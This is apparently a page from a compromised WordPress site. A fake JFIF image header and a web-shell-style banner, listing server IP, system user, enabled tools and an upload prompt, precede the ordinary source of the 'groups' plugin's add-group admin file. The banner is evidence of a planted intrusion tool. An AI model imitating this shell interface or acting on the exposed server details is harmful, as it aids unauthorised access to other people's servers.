????JFIF??x?x????'
Server IP : 104.21.80.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tempvsty/pontiacques.org/wp-content/plugins/groups/lib/admin/ |
Upload File : |
<?php /** * groups-admin-groups-add.php * * Copyright (c) "kento" Karim Rahimpur www.itthinx.com * * This code is released under the GNU General Public License. * See COPYRIGHT.txt and LICENSE.txt. * * This code is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * This header and all notices must be kept intact. * * @author Karim Rahimpur * @package groups * @since groups 1.1.0 */ if ( !defined( 'ABSPATH' ) ) { exit; } /** * Show add group form. */ function groups_admin_groups_add() { global $wpdb; $output = ''; if ( !Groups_User::current_user_can( GROUPS_ADMINISTER_GROUPS ) ) { wp_die( esc_html__( 'Access denied.', 'groups' ) ); } $current_url = ( is_ssl() ? 'https://' : 'http://' ) . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized $current_url = remove_query_arg( 'paged', $current_url ); $current_url = remove_query_arg( 'action', $current_url ); $current_url = remove_query_arg( 'group_id', $current_url ); $parent_id = isset( $_POST['parent-id-field'] ) ? sanitize_text_field( $_POST['parent-id-field'] ) : ''; $name = isset( $_POST['name-field'] ) ? sanitize_text_field( $_POST['name-field'] ) : ''; $description = isset( $_POST['description-field'] ) ? sanitize_textarea_field( $_POST['description-field'] ) : ''; $parent_select = '<select name="parent-id-field">'; $parent_select .= sprintf( '<option value="" %s>--</option>', empty( $parent_id ) ? 'selected="selected"' : '' ); $tree = Groups_Utility::get_group_tree(); Groups_Utility::render_group_tree_options( $tree, $parent_select, 0, array( $parent_id ) ); $parent_select .= '</select>'; $output .= '<div class="manage-groups wrap">'; $output .= '<h1>'; $output .= esc_html__( 'Add a new group', 'groups' ); $output .= '</h1>'; $output .= Groups_Admin::render_messages(); $output .= '<form id="add-group" action="' . esc_url( $current_url ) . '" method="post">'; $output .= '<div class="group new">'; $output .= '<div class="field">'; $output .= '<label for="name-field" class="field-label first required">'; $output .= esc_html__( 'Name', 'groups' ); $output .= '</label>'; $output .= sprintf( '<input id="name-field" name="name-field" class="namefield" type="text" value="%s"/>', esc_attr( stripslashes( $name ) ) ); $output .= '</div>'; $output .= '<div class="field">'; $output .= '<label for="parent-id-field" class="field-label">'; $output .= esc_html__( 'Parent', 'groups' ); $output .= '</label>'; $output .= $parent_select; $output .= '</div>'; $output .= '<div class="field">'; $output .= '<label for="description-field" class="field-label description-field">'; $output .= esc_html__( 'Description', 'groups' ); $output .= '</label>'; $output .= '<textarea id="description-field" name="description-field" rows="5" cols="45">'; $output .= stripslashes( wp_filter_nohtml_kses( $description ) ); $output .= '</textarea>'; $output .= '</div>'; $output .= '<div class="field">'; $capability_table = _groups_get_tablename( "capability" ); $capabilities = $wpdb->get_results( "SELECT * FROM $capability_table ORDER BY capability" ); // phpcs:ignore WordPress.DB.PreparedSQL.InterpolatedNotPrepared $selected_capabilities = isset( $_POST['capability_ids'] ) && is_array( $_POST['capability_ids'] ) ? $_POST['capability_ids'] : array(); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized $output .= '<div class="select-capability-container" style="width:62%;">'; $output .= '<label>'; $output .= esc_html__( 'Capabilities', 'groups' ); $output .= sprintf( '<select class="select capability" name="capability_ids[]" multiple="multiple" placeholder="%s">', esc_attr__( 'Choose capabilities …', 'groups' ) ); foreach( $capabilities as $capability ) { $output .= sprintf( '<option value="%s" %s>%s</option>', esc_attr( $capability->capability_id ), in_array( $capability->capability_id, $selected_capabilities ) ? 'selected="selected"' : '', stripslashes( wp_filter_nohtml_kses( $capability->capability ) ) ); } $output .= '</select>'; $output .= '</label>'; $output .= '</div>'; $output .= '<p class="description">'; $output .= esc_html__( 'These capabilities will be assigned to the group.', 'groups' ); $output .= '</p>'; $output .= Groups_UIE::render_select( '.select.capability' ); $output .= '</div>'; $output .= apply_filters( 'groups_admin_groups_add_form_after_fields', '' ); $output .= '<div class="field">'; $output .= wp_nonce_field( 'groups-add', GROUPS_ADMIN_GROUPS_NONCE, true, false ); $output .= sprintf( '<input class="button button-primary" type="submit" value="%s"/>', esc_attr__( 'Add', 'groups' ) ); $output .= '<input type="hidden" value="add" name="action"/>'; $output .= sprintf( '<a class="cancel button" href="%s">%s</a>', esc_url( $current_url ), esc_html__( 'Cancel', 'groups' ) ); $output .= '</div>'; $output .= '</div>'; // .group.new $output .= '</form>'; $output .= '</div>'; // .manage-groups echo $output; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped } // function groups_admin_groups_add /** * Handle add group form submission. * * @return int new group's id or false if unsuccessful */ function groups_admin_groups_add_submit() { if ( !Groups_User::current_user_can( GROUPS_ADMINISTER_GROUPS ) ) { wp_die( esc_html__( 'Access denied.', 'groups' ) ); } if ( !wp_verify_nonce( $_POST[GROUPS_ADMIN_GROUPS_NONCE], 'groups-add' ) ) { // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized wp_die( esc_html__( 'Access denied.', 'groups' ) ); } $creator_id = get_current_user_id(); $datetime = date( 'Y-m-d H:i:s', time() ); // phpcs:ignore WordPress.DateTime.RestrictedFunctions.date_date $parent_id = isset( $_POST['parent-id-field'] ) ? sanitize_text_field( $_POST['parent-id-field'] ) : null; $description = isset( $_POST['description-field'] ) ? sanitize_textarea_field( $_POST['description-field'] ) : ''; $name = isset( $_POST['name-field'] ) ? sanitize_text_field( $_POST['name-field'] ) : null; $group_id = Groups_Group::create( compact( "creator_id", "datetime", "parent_id", "description", "name" ) ); if ( $group_id ) { if ( !empty( $_POST['capability_ids'] ) ) { $caps = $_POST['capability_ids']; // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized if ( is_array( $caps ) ) { $caps = array_map( 'sanitize_text_field', $caps ); foreach( $caps as $cap ) { Groups_Group_Capability::create( array( 'group_id' => $group_id, 'capability_id' => $cap ) ); } } } do_action( 'groups_admin_groups_add_submit_success', $group_id ); } else { if ( !$name ) { Groups_Admin::add_message( __( 'The name must not be empty.', 'groups' ), 'error' ); } else if ( Groups_Group::read_by_name( $name ) ) { /* translators: group name */ Groups_Admin::add_message( sprintf( __( 'The <em>%s</em> group already exists.', 'groups' ), stripslashes( wp_filter_nohtml_kses( ( $name ) ) ) ), 'error' ); } } return $group_id; } // function groups_admin_groups_add_submit